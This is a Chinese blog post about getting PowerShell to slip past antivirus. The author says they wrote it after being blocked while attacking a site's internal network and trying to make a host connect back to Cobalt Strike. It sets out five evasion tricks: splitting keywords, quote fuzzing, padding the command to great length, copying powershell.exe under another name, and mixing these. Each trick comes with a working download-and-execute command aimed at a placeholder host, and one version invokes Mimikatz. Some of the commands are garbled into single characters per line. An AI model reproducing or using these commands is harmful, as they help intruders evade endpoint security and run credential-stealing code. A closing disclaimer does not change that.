本文介绍了如何在执行Powershell命令时进行免杀,包括关键字拆分、Fuzz思想、超长命令、使用copy命令以及混合方法等五种策略,旨在绕过杀毒软件的检测。同时,强调了技术的合法使用,提醒读者切勿用于非法活动。
Powershell免杀
0x01 前言
前几天搞一个站的时候,进入内网,想让内网一台机子powershell上线。然后被杀软拦截了,极其的不讲武德,想着找我极强的朋友们白嫖个免杀的方法。
后面还是没有白嫖到,只好自己去研究学习一下了(针对CS的进行免杀,后面思想大同小异)于是做了这个小笔记。
0x02 Powershell免杀思路
先介绍一下powershell木马最常用的方式,一般都为远程下载然后执行的方法,特点就是:直接内存运行,无文件落地。
例如:
powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://x.x.x.x/a’))”
通常使用过程中当调用powershell进行远程下载执行时,会被杀软进行拦截。那么针对Powershell的免杀有两个思路:
对ps1文件进行免杀处理
对Powershell的行为进行免杀处理
0x03 免杀方法
- 使用关键字拆分进行bypass
在实战过程中,一些杀软是会对powershell命令当中的参数、函数进行一个检测,那么此时就可以对关键字进行拆分来进行绕过。
例如,拆分前的powershell命令为:
powershell.exe "IEX ((new-object net.webclient).downloadstring(‘http://x.x.x.x/a’))”
假如杀软是对http这个关键字进行检测,那么我们可以对其进行如下拆分进行绕过,拆分后的powershell命令为:
powershell "
a
=
′
I
E
X
(
(
N
e
w
−
O
b
j
e
c
t
N
e
t
.
W
e
b
C
l
i
e
n
t
)
.
D
o
w
n
l
o
a
d
S
t
r
i
n
g
(
′
′
h
t
′
;
a='IEX((New-Object Net.WebClient).DownloadString(''ht';
a=′IEX((New−ObjectNet.WebClient).DownloadString(′′ht′;b=‘tp://x.x.x.x/a’’));Invoke-Mimikatz’;IEX (
a
+
a+
a+b)”
假如是对downloadstring这个函数进行检测,那么我们可以使用replace来进行替换函数拆分downloadstring进行一个绕过,拆分后的powershell命令如下:
powershell “
a
=
′
I
E
X
(
N
e
w
−
O
b
j
e
c
t
N
e
t
.
W
e
b
C
l
i
e
n
t
)
.
D
o
w
n
l
o
′
;
a='IEX(New-Object Net.WebClient).Downlo';
a=′IEX(New−ObjectNet.WebClient).Downlo′;b=‘123(’‘http://x.x.x.x’’)’.Replace(‘123’,‘adString’);IEX (
a
+
a+
a+b)”
2. Fuzz思想进行bypass
可以利用Fuzz的思想进行bypass,例如可以使用中文字符里的单引号进行bypass
例如,利用单引号混淆前的powershell命令为:
powershell.exe "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/a’))”
使用单引号混淆后的命令为:
powershell.exe "IEX ((new-object net.webclient).downloadstring('ht‘+’tp://x.x.x.x/a’))”
3. 超长命令bypass
可以使用超长的命令来进行bypass。
例如,利用超长命令bypas前的powershell命令为:
powershell.exe "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/a’))”
进行超长命令构造后的powershell命令为:
powershell.exe -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal w Normal -w Normal -w Normal -w Normal -w Normal -w Normal IEX ((new-object net.webclient).downloadstring(‘http://x.x.x.x/a’))
4. 使用copy命令进行bypass
这里讲一个骚操作,一些杀软是检测powershell这个使用的动作,那么我们可以使用windows的copy命令,将powshell进行拷贝命名为其他的,例如,使用copy命令将powershell拷贝一个并命名为bypass.txt
命令:
copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe bypass.txt
那么后面就可以这样子来执行powershell来进行绕过杀软检测:
bypass.txt IEX ((new-object net.webclient).downloadstring(‘http://x.x.x.x/a’))
5. 混合bypass
就是将前面讲述的几种方法进行混合使用。
例如:
powershell.exe -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal set-alias -name key -value IEX; key(New-Object Net.WebClient).DownloadString(‘ht‘+’tp://x.x.x.x/a’)
0x04 结尾
当然除了上述的几种方式可以进行bypass以外,还有其他的方法,例如可以将 powershell命令打包成exe程序进行绕过,可以使用C、Python、go等,其中查杀率:C > Python > go
当然了,年轻人是要讲武德的。
切勿利用上述方法去干不讲武德的事情,不然到时候啪的一下,很快啊,一不小心就进去了。
0x05 免责声明
严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !
1170
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
